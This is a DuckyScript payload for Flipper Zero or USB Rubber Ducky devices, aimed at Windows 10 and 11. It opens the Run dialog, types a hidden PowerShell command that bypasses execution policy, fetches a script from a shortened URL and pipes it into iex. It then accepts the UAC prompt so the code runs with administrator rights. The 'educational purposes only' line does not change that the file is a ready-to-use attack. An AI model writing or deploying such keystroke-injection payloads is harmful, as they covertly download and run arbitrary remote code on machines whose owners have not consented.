REM     Title: File Downloader
REM     Description: This payload for Flipper Zero or USB Rubber Ducky swiftly downloads a file from a provided link and executes it on the target system, offering a concise and efficient method for remote file execution. Ideal for tasks like penetration testing and system administration.
REM     Target: Windows 10, 11

GUI r
DELAY 500
REM Make sure your file isnt malicious and its not getting flagged by AV, this is just for educational purposes only!
STRING powershell -w h -NoP -Ep Bypass -Command $url='File download link'; $extension='exe/jpg/png/pdf/bat/ps1...'; irm https://t.ly/IDPkt | iex
CTRL-SHIFT ENTER
DELAY 1000
ALT y
